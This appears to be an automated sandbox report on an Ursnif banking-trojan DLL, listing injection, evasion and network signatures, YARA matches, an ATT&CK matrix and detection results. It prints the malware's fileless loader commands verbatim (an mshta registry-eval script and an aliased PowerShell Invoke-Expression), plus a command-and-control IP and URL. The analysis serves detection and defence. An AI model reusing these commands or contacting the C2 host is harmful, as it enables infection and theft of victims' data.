                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0580591B wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,2_2_0580591B
                      Source: explorer.exe, 00000021.00000000.427438325.00000000051AC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                      Source: explorer.exe, 00000021.00000000.427485687.00000000051D2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}71USER
                      Source: explorer.exe, 00000021.00000000.385694451.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                      Source: explorer.exe, 00000021.00000000.384966300.0000000005EAB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000021.00000000.383500997.000000000510C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000021.00000000.427485687.00000000051D2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: explorer.exe, 00000021.00000000.385694451.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                      Source: mshta.exe, 00000017.00000003.329575243.0000022F66BCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: mshta.exe, 00000017.00000003.329575243.0000022F66BCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000021.00000000.383500997.000000000510C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: explorer.exe, 00000021.00000000.385694451.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}on:Mondz?S
                      Source: explorer.exe, 00000021.00000000.385694451.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00dRom0cY
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0580A513 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0580A513
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0580BE55 StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,2_2_0580BE55

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 146.70.35.138 80Jump to behavior
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF61B5912E0Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF61B5912E0Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 352000Jump to behavior
                      Injects code into the Windows Explorer (explorer.exe)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 352000 value: 00Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3616 base: 7FF802BC1580 value: EBJump to behavior
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 2BC1580Jump to behavior
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdlineJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.cmdlineJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2392.tmp" "c:\Users\user\AppData\Local\Temp\poet0yxq\CSCB57F583549494C91A9647985948976.TMP"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3B60.tmp" "c:\Users\user\AppData\Local\Temp\bscdh0f0\CSCCEA1AC591E3E41DFA7DCA22F6F20A95.TMP"Jump to behavior
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -hJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: explorer.exe, 00000021.00000000.408252291.0000000005E60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000000.379131274.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.408234525.0000000005610000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000021.00000000.400441587.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000000.379131274.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.421471137.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000021.00000000.379131274.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.421471137.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.400760841.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager,
                      Source: explorer.exe, 00000021.00000000.379131274.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.421471137.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000021.00000000.400760841.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F12D3 cpuid 2_2_049F12D3
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05804DF5 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,2_2_05804DF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F5410 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,2_2_049F5410
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F515F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,2_2_049F515F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F12D3 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,2_2_049F12D3

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.260779553.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.308220825.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.260884971.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.309153947.0000000004D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.306041676.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261032532.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261191379.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.260987111.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261105592.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261071181.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261177888.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5292, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6612, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.48994a0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.49f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.48994a0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4e7a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f26940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4ef94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4e7a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.307999471.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.418290264.0000000004899000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.307957841.0000000004E7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.420929959.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.260779553.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.308220825.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.260884971.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.309153947.0000000004D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.306041676.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261032532.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261191379.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.260987111.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261105592.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261071181.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261177888.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5292, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6612, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.48994a0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.49f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.48994a0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4e7a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f26940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4ef94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4e7a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.307999471.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.418290264.0000000004899000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.307957841.0000000004E7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.420929959.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      1
                      Valid Accounts                      		1
                      Windows Management Instrumentation                      		1
                      Valid Accounts                      		1
                      Valid Accounts                      		1
                      Obfuscated Files or Information                      		OS Credential Dumping1
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		Exfiltration Over Other Network Medium2
                      Ingress Tool Transfer                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                      Data Encrypted for Impact
                      Default Accounts3
                      Native API                      		Boot or Logon Initialization Scripts1
                      Access Token Manipulation                      		1
                      File Deletion                      		LSASS Memory1
                      Account Discovery                      		Remote Desktop Protocol1
                      Email Collection                      		Exfiltration Over Bluetooth2
                      Encrypted Channel                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts1
                      Command and Scripting Interpreter                      		Logon Script (Windows)413
                      Process Injection                      		1
                      Masquerading                      		Security Account Manager3
                      File and Directory Discovery                      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Non-Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Valid Accounts                      		NTDS25
                      System Information Discovery                      		Distributed Component Object ModelInput CaptureScheduled Transfer11
                      Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Access Token Manipulation                      		LSA Secrets1
                      Query Registry                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common31
                      Virtualization/Sandbox Evasion                      		Cached Domain Credentials11
                      Security Software Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items413
                      Process Injection                      		DCSync31
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      Rundll32                      		Proc Filesystem3
                      Process Discovery                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                      Application Window Discovery                      		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                      System Owner/User Discovery                      		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture11
                      Remote System Discovery                      		Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeylogging1
                      System Network Configuration Discovery                      		Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 614287 Sample: VoevdOQpeU.dll Startdate: 23/04/2022 Architecture: WINDOWS Score: 100 61 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->61 63 Found malware configuration 2->63 65 Multi AV Scanner detection for submitted file 2->65 67 8 other signatures 2->67 9 mshta.exe 19 2->9         started        11 loaddll32.exe 1 2->11         started        process3 process4 13 powershell.exe 33 9->13         started        16 cmd.exe 1 11->16         started        18 WerFault.exe 6 9 11->18         started        20 WerFault.exe 2 9 11->20         started        22 WerFault.exe 11->22         started        signatures5 81 Injects code into the Windows Explorer (explorer.exe) 13->81 83 Writes to foreign memory regions 13->83 85 Creates a thread in another existing process (thread injection) 13->85 24 explorer.exe 13->24 injected 27 csc.exe 3 13->27         started        30 csc.exe 3 13->30         started        32 conhost.exe 13->32         started        34 rundll32.exe 1 6 16->34         started        process6 dnsIp7 73 Self deletion via cmd delete 24->73 37 cmd.exe 24->37         started        53 C:\Users\user\AppData\Local\...\poet0yxq.dll, PE32 27->53 dropped 40 cvtres.exe 1 27->40         started        55 C:\Users\user\AppData\Local\...\bscdh0f0.dll, PE32 30->55 dropped 42 cvtres.exe 1 30->42         started        57 146.70.35.138, 49766, 80 TENET-1ZA United Kingdom 34->57 75 System process connects to network (likely due to code injection or exploit) 34->75 77 Writes to foreign memory regions 34->77 79 Writes registry values via WMI 34->79 44 control.exe 1 34->44         started        file8 signatures9 process10 signatures11 69 Uses ping.exe to sleep 37->69 71 Uses ping.exe to check the status of other devices and networks 37->71 46 PING.EXE 37->46         started        49 conhost.exe 37->49         started        51 rundll32.exe 44->51         started        process12 dnsIp13 59 192.168.2.1 unknown unknown 46->59

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      VoevdOQpeU.dll38%ReversingLabsWin32.Trojan.Lazy
                      VoevdOQpeU.dll100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      2.2.rundll32.exe.49f0000.0.unpack100%AviraHEUR/AGEN.1245293Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://146.70.35.138/phpadmin/Vo3V1ij8xfQAzbYEppxuGj/YfKBcB_2BiFsK/C5o_2FK1/LFX_2FAQmA1J0Gg2IGK0zii/Cqu4J51vDj/wlNBNCb18BPgk55aw/3DJofkjbHHw_/2F3O9t6XtUN/FhzyouLiXCH4qy/e6m_2F6Bp87emTDJkwB0B/GJSc0pfzfjLvMKIS/Fcz1B6FomHVea2H/3F6nRjbT0qghS0NNIb/kfO6CmRa0/E8U4GDXz2DXZU_2BDOzp/T84va5G8JnhB3/UMJfQ.src0%Avira URL Cloudsafe
                      http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
